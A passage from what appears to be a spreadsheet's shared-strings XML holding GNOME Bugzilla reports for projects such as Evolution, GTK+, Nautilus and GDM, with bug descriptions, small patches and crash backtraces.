==8744==    by 0x0fe8db60: gtk_widget_child_focus (gtkwidget.c:5895)
==8744==</t>
  </si>
  <si>
    <t>EVOLUTION-518506</t>
  </si>
  <si>
    <t>Setting alway reset back to default</t>
  </si>
  <si>
    <t>Please describe the problem:
I select a wav file to play whenever there is a new mail arriving and it used to work but somehow it is not working now. It will alway reset the wav file that i selected back to (None)
Steps to reproduce:
1. Edit-&gt;Preferences
2. Mail Preferences-&gt;New Mail Notification-&gt;Play sound when new mail arrives
3. Specify filename-&gt;bugs_mail.wav-&gt;Close
Actual results:
It rese the filename that i specified back to (None)
Expected results:
To play the wav file everytime there is a new mail
Does this happen every time?
It used to work but it is not working now.
Other information:
BTW the gnome version that i am using is 2.20.1 but the VERSION SELECTION page is not showing this in the list.</t>
  </si>
  <si>
    <t>yongchiaowoei</t>
  </si>
  <si>
    <t>FILE-ROLLER-433149</t>
  </si>
  <si>
    <t>In the theme-friendly-icons gnome goal:
  http://live.gnome.org/GnomeGoals/AppIcon
We made all apps run gtk-update-icon-cache in install-hook.  They also should
call it in uninstall-hook.</t>
  </si>
  <si>
    <t>GNOME-NETSTATUS-150195</t>
  </si>
  <si>
    <t>Executable permissions on help/C/*</t>
  </si>
  <si>
    <t>The .xml files in help/C are marked executable.</t>
  </si>
  <si>
    <t>INTLTOOL-311521</t>
  </si>
  <si>
    <t>typo in intltool-merge man page s/seperated/separated</t>
  </si>
  <si>
    <t>Hi
A Costa reported in Debian bug http://bugs.debian.org/311444 a typo in the
intltool-merge manual page.
Please replace seperated by separated.
Bye</t>
  </si>
  <si>
    <t>GTK+-112391</t>
  </si>
  <si>
    <t>Uninstalled gdk-pixbuf.loaders while cross-compiling</t>
  </si>
  <si>
    <t>The uninstalled gdk-pixbuf.loaders file is not built when cross-compiling
which causes the build to fail because some example programs depend on it.
A simple solution would appear to be to create an empty file for the use of
uninstalled example programs with an appropriate warning message.
The following patch (which is also available for download from
http://avrc.city.ac.uk/junk/gtk+-2.2.1-gdk-pixbuf-loaders.patch) achieves this:
--- ../gtk+-2.2.1/gdk-pixbuf/Makefile.am	Mon Jan 27 22:47:12 2003
+++ ./gdk-pixbuf/Makefile.am	Wed Apr 23 17:33:26 2003
@@ -43411 +43413 @@
 	  echo ***  \
 	fi
-if CROSS_COMPILING
-else
 all-local: gdk-pixbuf.loaders
-endif
+if CROSS_COMPILING
+gdk-pixbuf.loaders:
+
echo Cross-compiling will use only static modules for uninstalled example
programs. \
+
touch gdk-pixbuf.loaders
+else
 gdk-pixbuf.loaders: $(loader_LTLIBRARIES) gdk-pixbuf-query-loaders
 	LOADERS=`echo libpixbufloader-*.la`  \
 	if test x$$LOADERS != 'xlibpixbufloader-*.la'  then \
@@ -4486 +4507 @@
           echo No dynamic modules found will use only static modules for
uninstalled example programs. \
 	  touch gdk-pixbuf.loaders \
 	fi
+endif
 uninstall-local: uninstall-ms-lib uninstall-libtool-import-lib</t>
  </si>
  <si>
    <t>j.a.harlow</t>
  </si>
  <si>
    <t>EVOLUTION-210589</t>
  </si>
  <si>
    <t>'move' filter to bad folder silently deletes email</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
when a filter indicates that an email should be moved into a new folder
and if that folder moves or is deleted then the email message to which the
filter is being applied simply disappears.  it appears that although the
'copy to new folder' failed the 'delete message' part of the move is still
applied.  this is incredibly bad form.  once i moved a folder somewhere
else (the filter should have been smart enough to track it i guess it
tracks folders by name/path not by any id) and suddenlly ALL the email
destined for that folder was simply being deleted.
Steps to reproduce the problem:
1. create a folder
2. create a filter that moves incoming email to that folder then stops the
processing
3. delete that folder
4. apply the filter to an email that matches.  the email will dissapper
Actual Results:
emails get deleted but not moved to any folder they are simply and very
silently lost for ever (afaict)
Expected Results:
filter fail email NOT moved.  perhaps an error message indicating which
step of which filter failed and the optoin to proceed applying filters or
stopping.
How often does this happen? 
once the step above are completed it is 100% reproducable.
Additional Information:</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-160152</t>
  </si>
  <si>
    <t>attempted to open settings menu</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution:                      Solaris 8 HW 7/03 s28s_hw3wos_05a SPARC
Package: gnome-games
Severity: normal
Version: GNOME2.6. 2.6.0.1
Gnome-Distributor: GNOME.Org
Synopsis: attempted to open settings menu
Bugzilla-Product: gnome-games
Bugzilla-Component: gnect
Bugzilla-Version: 2.6.0.1
BugBuddy-GnomeVersion: 2.0 (2.6.0)
Description:
Description of the crash:
attempted to open settings menu
Steps to reproduce the crash:
1. open program
2. click on Settings menu
3. 
Expected Results:
application quits unexpectedly
How often does this happen?
every time
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/local/bin/gnect'
(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sol-thread active.
Retry #1:
Retry #2:
Retry #3:
Retry #4:
[New LWP    1        ]
[New Thread 1 (LWP 1)]
[Switching to Thread 1 (LWP 1)]
0xfde1fa04 in _waitid () from /usr/lib/libc.so.1
#0  0xfde1fa04 in _waitid () from /usr/lib/libc.so.1
#1  0xfddd6c6c in _waitpid () from /usr/lib/libc.so.1
#2  0xfdd5a3f4 in waitpid () from /usr/lib/libthread.so.1
#3  0xfdd5a3f4 in waitpid () from /usr/lib/libthread.so.1
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-12-01 17:57 -------
Unknown version 2.6.0.1 in product gnome-games.  Setting version to unspecified.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product gnome-games.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was scarlson@ufl.edu.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>scarlson</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-396396</t>
  </si>
  <si>
    <t>Canfield allows unlimited redeals</t>
  </si>
  <si>
    <t>That bug has been opened on https://launchpad.net/ubuntu/+source/gnome-games/+bug/77253
Binary package hint: gnome-games
Aisle-riot 1:2.16.1-0ubuntu1 (edgy)
Canfield: The help file says that the stock has two redeals. The game allows unlimited redeals meaning that you can't lose (however you can't win either you are just stuck redealing). Either the help file needs updating or the game needs to enforce only two redeals.</t>
  </si>
  <si>
    <t>NAUTILUS-407618</t>
  </si>
  <si>
    <t>Build fails with GSequence in Glib</t>
  </si>
  <si>
    <t>Now that GSequence is in Glib the build (jhbuild environment) fails in the cut-n-paste gsequence.c due to duplicate definitions.</t>
  </si>
  <si>
    <t>EVOLUTION-200515</t>
  </si>
  <si>
    <t>Shell must tell user when a component crashes</t>
  </si>
  <si>
    <t>People do not seem to understand what is happening when a component crashes.
We continue to get bug reports of the form I do X and then the toolbar
disappears and I can't see the messages any more.
The component needs to pop up a dialog in this case. I don't know if this
will require help from Bonobo.</t>
  </si>
  <si>
    <t>WEBSITE-334623</t>
  </si>
  <si>
    <t>Co-organizers in the footer</t>
  </si>
  <si>
    <t>The GNOME Foundation the Generalitat the Campus de la mediterrÃ nia and GNOME Hispano need to appear in the footer as co-organisers in a powered by fashion.
It would be great to find also a cute solution to include Nokia as cornerstone sponsor.</t>
  </si>
  <si>
    <t>johnyhwang</t>
  </si>
  <si>
    <t>EVOLUTION-213498</t>
  </si>
  <si>
    <t>Evo can't finish download images...</t>
  </si>
  <si>
    <t xml:space="preserve">Package: GtkHtml
Priority: Normal
Version: 0.16.99
Synopsis: Evo can't finish download images...
Bugzilla-Product: GtkHtml
Bugzilla-Component: Rendering
Description:
1.- I open and http message
2.- Download the images...
3.- Close the window before all images were downloaded...
4.- The progress bar at the bottom of EVo...says Loading message
contents (...)
5.- Evo or evo-mailer freezes...or at least it waits for a veeeery long
time...and sometimes...i dont know exactly why...it stops...like if it's
already downloaded the images....im not sure...
Sorry about my English
</t>
  </si>
  <si>
    <t>jst</t>
  </si>
  <si>
    <t>GTK-DOC-157114</t>
  </si>
  <si>
    <t>webpage for this project</t>
  </si>
  <si>
    <t>The title says it all.</t>
  </si>
  <si>
    <t>GDM-529686</t>
  </si>
  <si>
    <t>configure.ac in SVN head contains unused HALT REBOOT SUSPEND settings</t>
  </si>
  <si>
    <t xml:space="preserve">Please describe the problem:
in the Check for Halt and Reboot commands an openbsd section should be added just like the freebsd section. this reduces the amount of local patches in openbsd ports.
Steps to reproduce:
Actual results:
fewer openbsd specific patches
Expected results:
Does this happen every time?
Other information:
no actual diff attached as it's fairly trivial. add the following beneath *freebsd*) and above *) in the Check for Halt and Reboot commands part of configure.ac:
*openbsd*)
	HOST_GDM_USER_PATH=/bin:/usr/bin
	HOST_HALT_COMMAND=/sbin/halt -p/usr/bin/poweroff/sbin/poweroff/sbin/shutdown -h now/usr/sbin/shutdown -h now
	HOST_REBOOT_COMMAND=/usr/bin/reboot/sbin/reboot/sbin/shutdown -r now/usr/sbin/shutdown -r now
	HOST_SUSPEND_COMMAND=/usr/bin/zzz
	HOST_XSESSION_SHELL=/bin/sh
	HOST_SOUND_PROGRAM=$(prefix)/bin/play
	HOST_GDMGNOMESESSIONCMD=gnome-session
	HOST_UTMP_LINE_ATTACHED=/dev/console
	HOST_UTMP_LINE_REMOTE=
	HOST_UTMP_PSEUDO_DEVICE=false
</t>
  </si>
  <si>
    <t>DOXYGEN-323399</t>
  </si>
  <si>
    <t>simple c++ code causes crash</t>
  </si>
  <si>
    <t>Version details: 2.6.14 kernel
Distribution/Version: FC4
process a file containing:-
/** AClass.
  To demonstrate a way of crashing doxygen.
*/
class AClass  {
public:
    AClass(void) ///&lt; Constructor
    int AMethod(uint value) { return 2*value } ///&lt;
}
and both doxygen 1.4.4 and 1.4.5 abort with:-
Computing page relations...
Sorting lists...
Freeing entry tree
Segmentation fault</t>
  </si>
  <si>
    <t>loris</t>
  </si>
  <si>
    <t>NAUTILUS-45077</t>
  </si>
  <si>
    <t>Remove nautilus_gdk_pixbuf_render_to_pixbuf_tiled</t>
  </si>
  <si>
    <t xml:space="preserve">
------- Additional Comments From rebecka@eazel.com 2000-12-07 19:35:39 ----
There is a FIXME about this only being called by test code 
in nautilus-gdk-pixbuf-extensions.c
------- Additional Comments From darin@bentspoon.com 2001-01-04 16:47:04 ----
Ramiro meant to mark this fixed on 12/19 (as per ChangeLog).
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:46 -------
The original owner (engber@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNOME-MAIN-MENU-393708</t>
  </si>
  <si>
    <t>fix build with C89 compilers</t>
  </si>
  <si>
    <t>The following path is against control-center-2.17.3 and makes slab build with gcc 2.</t>
  </si>
  <si>
    <t>NAUTILUS-410996</t>
  </si>
  <si>
    <t>Nautilus Copy Disk... functionality</t>
  </si>
  <si>
    <t>If one doesn't use Nautilus to draw the desktop (e.g. to save on memory usage) the Copy Disk... functionality for CDs or DVDs appears to be nowhere accessible. The only way of using that functionality is to re-enable Nautilus to draw the desktop followed by right-clicking on the CD or DVD icon on the desktop. At least I wasn't able to find an alternative in Nautilus itself. Because it's a very useful feature I think this functionality should be more easily accessible e.g. in the pop-up menu of the CD or DVD drive in the Computer view of Nautilus.
Version details: 2.16.2</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-744316</t>
  </si>
  <si>
    <t>CSS: Don't show obvious links for help links</t>
  </si>
  <si>
    <t>On any show_bug.cgi link the number of links that nobody will ever use is jarring.
Especially the crap link:
      Status:
That the link just goes to an explanation is visually noisy. It is pretty distracting. IMO we should at most show this as black or really dark grey. No blue no underline!</t>
  </si>
  <si>
    <t>GNOME-SHELL-691720</t>
  </si>
  <si>
    <t>network-indicator</t>
  </si>
  <si>
    <t>network: support NM 0.9.6 again</t>
  </si>
  <si>
    <t>This is intended as just a temporary kludge to allow people to use
unstable gnome-shell without having to build NM from git. So it
doesn't fully restore the original
disambiguating-multiple-ethernet-cards functionality. (They'll both
show up as just Wired now if you have 0.9.6. But at least the
network indicator will show up at all...)</t>
  </si>
  <si>
    <t>GUCHARMAP-334505</t>
  </si>
  <si>
    <t>Search buttons Prev Next unsensitive when they shouldn't be</t>
  </si>
  <si>
    <t>Open the search dialog.  Search for something that cannot be found.
The Prev and Next buttons become unsensitive.  Now toggle one of the search options like Match whole word or Search in character details.  Observe that the Prev/Next buttons are still unsensitive while they shouldn't.</t>
  </si>
  <si>
    <t>RHYTHMBOX-303432</t>
  </si>
  <si>
    <t>Rhythmbox hangs while switching songs</t>
  </si>
  <si>
    <t>Please describe the problem:
Rhythmbox hangs while starting to play a new song.
Steps to reproduce:
1. Make a library (mine has 277 MP3 @ 192kbps)
2. Double click a song (to start playing).  or play a song and click next.
3. quickly scroll up or down (I use my mouse's scroll wheel).
Actual results:
rhythmbox hangs/locks up for half a second or so before playing the song
Expected results:
rhythmbox should be usuable while it prepares to play a song
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>jamesm51</t>
  </si>
  <si>
    <t>GTK+-8286</t>
  </si>
  <si>
    <t>avoiding a nasty design of gtk_label_get with a very simple patch</t>
  </si>
  <si>
    <t xml:space="preserve">
 Package: gtk+
 Version: 1.2.6
Description:
Now there's a bad function in gtklabel.c:
void
gtk_label_get (GtkLabel *label
               gchar   **str)
that doesn't malloc the memory for *str.
(This is really really a bad thing because I can change an internal
data structure of the label widget throught the pointer returned in
str).
But that's easy to resolve.
We have gtk_label_set_text and gtk_label_get. (Even bad naming
consistency here).
Well simply add:
gchar *gtk_label_get_text (GtkLabel *label)
(returning a malloced (gchar *) of the internal label that the widget
has)
in gtklabel.c and you get 4 improvements in 1 change:
1) Better naming consistency: You have: gtk_label_set_text and
gtk_label_get_text (Better IMHO).
2) You return malloced strings which is a lot better.
3) Better naming consistency with gtk_entry_get_text (that also returns
the text
as a malloced string).
4) You still are backwards-compatible with the old gtk_label_get.
Of course the use of gtk_label_get should be discouraged in every
Tutorial
Book (GGAD has this) about GTK+.
I append two patch files one for gtklabel.h and other for gtklabel.c
that are very simple and I think kills the problem totally...
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 14:47 -------
This bug was previously known as bug 8286 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=8286
Originally filed under the gtk+ product and general component.
The original reporter (acampos@ceronet.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gtk-bugs@gtk.org.
</t>
  </si>
  <si>
    <t>acampos</t>
  </si>
  <si>
    <t>YELP-371680</t>
  </si>
  <si>
    <t>crash in Help: clicked 'lilypond info p...</t>
  </si>
  <si>
    <t>Version: 2.16.1
What were you doing when the application crashed?
clicked 'lilypond info page' link
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 114782208 vsize: 0 resident: 114782208 share: 0 rss: 34668544 rss_rlim: 0
CPU usage: start_time: 1162841969 rtime: 0 utime: 718 stime: 0 cutime:640 cstime: 0 timeout: 78 it_real_value: 0 frequency: 73
Backtrace was generated from '/usr/bin/yelp'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1227954512 (LWP 5641)]
[New Thread -1301296224 (LWP 5658)]
[New Thread -1292903520 (LWP 5657)]
[New Thread -1284510816 (LWP 5656)]
[New Thread -1276118112 (LWP 5655)]
[New Thread -1266177120 (LWP 5648)]
[New Thread -1247695968 (LWP 5645)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb765034b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7eac1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0xffffe410 in __kernel_vsyscall ()
#5  0xb745a770 in raise () from /lib/tls/i686/cmov/libc.so.6
#6  0xb745bef3 in abort () from /lib/tls/i686/cmov/libc.so.6
#7  0xb7791122 in g_logv () from /usr/lib/libglib-2.0.so.0
#8  0xb7791159 in g_log () from /usr/lib/libglib-2.0.so.0
#9  0xb77911d6 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
#10 0xb777f151 in g_io_channel_write_unichar () from /usr/lib/libglib-2.0.so.0
#11 0xb777fa39 in g_io_channel_read_to_end () from /usr/lib/libglib-2.0.so.0
#12 0x0806fd4e in ?? ()
#13 0x087e5e10 in ?? ()
#14 0xbfd272a8 in ?? ()
#15 0xbfd272ac in ?? ()
#16 0xbfd272a4 in ?? ()
#17 0x08085c78 in ?? ()
#18 0x00000000 in ?? ()
Thread 7 (Thread -1247695968 (LWP 5645)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb74f4803 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb6f27f89 in PR_Poll () from /usr/lib/libnspr4.so
No symbol table info available.
#3  0xb684348b in NSGetModule () from /usr/lib/firefox/components/libnecko.so
No symbol table info available.
#4  0xb6843cc2 in NSGetModule () from /usr/lib/firefox/components/libnecko.so
No symbol table info available.
#5  0xb73ef74b in nsIThread::SetMainThread ()
   from /usr/lib/firefox/libxpcom_core.so
No symbol table info available.
#6  0xb6f2c1ed in PR_JoinThread () from /usr/lib/libnspr4.so
No symbol table info available.
#7  0xb7649504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#8  0xb74fe51e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 6 (Thread -1266177120 (LWP 5648)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb764ca8c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6f253b3 in PRP_NakedNotify () from /usr/lib/libnspr4.so
No symbol table info available.
#3  0xb6f26241 in PR_WaitCondVar () from /usr/lib/libnspr4.so
No symbol table info available.
#4  0xb73f1a46 in nsIThread::SetMainThread ()
   from /usr/lib/firefox/libxpcom_core.so
No symbol table info available.
#5  0xb73ef74b in nsIThread::SetMainThread ()
   from /usr/lib/firefox/libxpcom_core.so
No symbol table info available.
#6  0xb6f2c1ed in PR_JoinThread () from /usr/lib/libnspr4.so
No symbol table info available.
#7  0xb7649504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#8  0xb74fe51e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 5 (Thread -1276118112 (LWP 5655)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb764ca8c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6f253b3 in PRP_NakedNotify () from /usr/lib/libnspr4.so
No symbol table info available.
#3  0xb6f26241 in PR_WaitCondVar () from /usr/lib/libnspr4.so
No symbol table info available.
#4  0xb681e645 in NSGetModule () from /usr/lib/firefox/components/libnecko.so
No symbol table info available.
#5  0xb6f2c1ed in PR_JoinThread () from /usr/lib/libnspr4.so
No symbol table info available.
#6  0xb7649504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb74fe51e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 4 (Thread -1284510816 (LWP 5656)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb764ca8c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6f253b3 in PRP_NakedNotify () from /usr/lib/libnspr4.so
No symbol table info available.
#3  0xb6f26241 in PR_WaitCondVar () from /usr/lib/libnspr4.so
No symbol table info available.
#4  0xb681e645 in NSGetModule () from /usr/lib/firefox/components/libnecko.so
No symbol table info available.
#5  0xb6f2c1ed in PR_JoinThread () from /usr/lib/libnspr4.so
No symbol table info available.
#6  0xb7649504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb74fe51e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 3 (Thread -1292903520 (LWP 5657)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb764ca8c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6f253b3 in PRP_NakedNotify () from /usr/lib/libnspr4.so
No symbol table info available.
#3  0xb6f26241 in PR_WaitCondVar () from /usr/lib/libnspr4.so
No symbol table info available.
#4  0xb681e645 in NSGetModule () from /usr/lib/firefox/components/libnecko.so
No symbol table info available.
#5  0xb6f2c1ed in PR_JoinThread () from /usr/lib/libnspr4.so
No symbol table info available.
#6  0xb7649504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb74fe51e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 2 (Thread -1301296224 (LWP 5658)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb764ca8c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6f253b3 in PRP_NakedNotify () from /usr/lib/libnspr4.so
No symbol table info available.
#3  0xb6f26241 in PR_WaitCondVar () from /usr/lib/libnspr4.so
No symbol table info available.
#4  0xb681e645 in NSGetModule () from /usr/lib/firefox/components/libnecko.so
No symbol table info available.
#5  0xb6f2c1ed in PR_JoinThread () from /usr/lib/libnspr4.so
No symbol table info available.
#6  0xb7649504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb74fe51e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1227954512 (LWP 5641)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb765034b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7eac1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#5  0xb745a770 in raise () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#6  0xb745bef3 in abort () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#7  0xb7791122 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0xb7791159 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb77911d6 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0xb777f151 in g_io_channel_write_unichar () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0xb777fa39 in g_io_channel_read_to_end () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x0806fd4e in ?? ()
No symbol table info available.
#13 0x087e5e10 in ?? ()
No symbol table info available.
#14 0xbfd272a8 in ?? ()
No symbol table info available.
#15 0xbfd272ac in ?? ()
No symbol table info available.
#16 0xbfd272a4 in ?? ()
No symbol table info available.
#17 0x08085c78 in ?? ()
No symbol table info available.
#18 0x00000000 in ?? ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>EVOLUTION-242952</t>
  </si>
  <si>
    <t>resizing the folder tree makes the message-list jump around</t>
  </si>
  <si>
    <t>folder tree displayed message list with plenty of messages in it (enough
to scroll).
go to the end of the message list and select a message.
grab the vertical pane separator between the folder tree and the message
list and move it from side to side
the message-list area displayed jumps (toggles between) from the current
cursor position to the top of the list and back again.  it doesnt move the
cusror just the area displayed and the scrollbar position.</t>
  </si>
  <si>
    <t>EVOLUTION-420973</t>
  </si>
  <si>
    <t>crash in e_task_bar_get_task_widget at e-task-bar.c:219</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Upgrade von Version 2.6.0-49.23 auf Version 2.8.3-4.4
Distribution: SUSE LINUX 10.1 (i586)
Gnome Release: 2.16.3 2007-02-13 (SUSE)
BugBuddy Version: 2.16.1
System: Linux 2.6.16.27-0.9-default #1 Tue Feb 13 09:35:18 UTC 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 60900000
Selinux: No
Accessibility: Disabled
Memory status: size: 102227968 vsize: 0 resident: 102227968 share: 0 rss: 7835648 rss_rlim: 0
CPU usage: start_time: 1174479541 rtime: 0 utime: 185 stime: 0 cutime:151 cstime: 0 timeout: 34 it_real_value: 0 frequency: 0
Backtrace was generated from '/opt/gnome/bin/evolution-2.8'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1234835264 (LWP 6441)]
[New Thread -1303450720 (LWP 6470)]
[New Thread -1292133472 (LWP 6469)]
[New Thread -1275155552 (LWP 6468)]
[New Thread -1283548256 (LWP 6458)]
[New Thread -1266762848 (LWP 6454)]
[New Thread -1258370144 (LWP 6453)]
[New Thread -1249977440 (LWP 6452)]
[New Thread -1241457760 (LWP 6451)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb728e33b in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0xb77a3ced in libgnomeui_segv_handle ()
   from /opt/gnome/lib/libgnomeui-2.so.0
#3  0x08060279 in segv_redirect ()
#4  
#5  0xb7eb8298 in e_task_bar_get_task_widget ()
   from /opt/gnome/lib/evolution/2.8/libemiscwidgets.so.0
#6  0xb7e93d72 in e_activity_handler_operation_progressing ()
   from /opt/gnome/lib/evolution/2.8/libemiscwidgets.so.0
#7  0xb62f67f6 in do_op_status ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
#8  0xb62f64de in mail_msgport_received ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
#9  0xb684ba4d in g_io_unix_dispatch () from /opt/gnome/lib/libglib-2.0.so.0
#10 0xb6822002 in g_main_context_dispatch ()
   from /opt/gnome/lib/libglib-2.0.so.0
#11 0xb682503f in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
#12 0xb68253e9 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
#13 0xb752e9f3 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#14 0x080600a5 in main ()
Thread 9 (Thread -1241457760 (LWP 6451)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb678ad11 in ___newselect_nocancel () from /lib/libc.so.6
No symbol table info available.
#2  0xb79d374c in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7d17fae in ep_msg_send () from /opt/gnome/lib/libedataserverui-1.2.so.8
No symbol table info available.
#4  0xb7d19741 in e_passwords_ask_password ()
   from /opt/gnome/lib/libedataserverui-1.2.so.8
No symbol table info available.
#5  0xb62fe46d in get_password ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#6  0xb7d58cf5 in camel_session_get_password ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#7  0xb60147ee in pop3_try_authenticate ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelpop3.so
No symbol table info available.
#8  0xb6014ce9 in pop3_connect ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelpop3.so
No symbol table info available.
#9  0xb7d57bc3 in camel_service_connect ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#10 0xb7d58f02 in camel_session_get_service_connected ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#11 0xb6300352 in mail_tool_get_inbox ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#12 0xb62faa46 in fetch_mail_fetch ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#13 0xb62f5d75 in mail_msg_received ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#14 0xb79d3dd4 in thread_dispatch ()
   from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#15 0xb728734b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#16 0xb679165e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 8 (Thread -1249977440 (LWP 6452)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb678ad11 in ___newselect_nocancel () from /lib/libc.so.6
No symbol table info available.
#2  0xb79d374c in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7d17fae in ep_msg_send () from /opt/gnome/lib/libedataserverui-1.2.so.8
No symbol table info available.
#4  0xb7d19855 in e_passwords_get_password ()
   from /opt/gnome/lib/libedataserverui-1.2.so.8
No symbol table info available.
#5  0xb62fe34b in get_password ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#6  0xb7d58cf5 in camel_session_get_password ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#7  0xb5804378 in imap_connect_online ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelimap.so
No symbol table info available.
#8  0xb7d38776 in disco_connect ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#9  0xb7d57bc3 in camel_service_connect ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
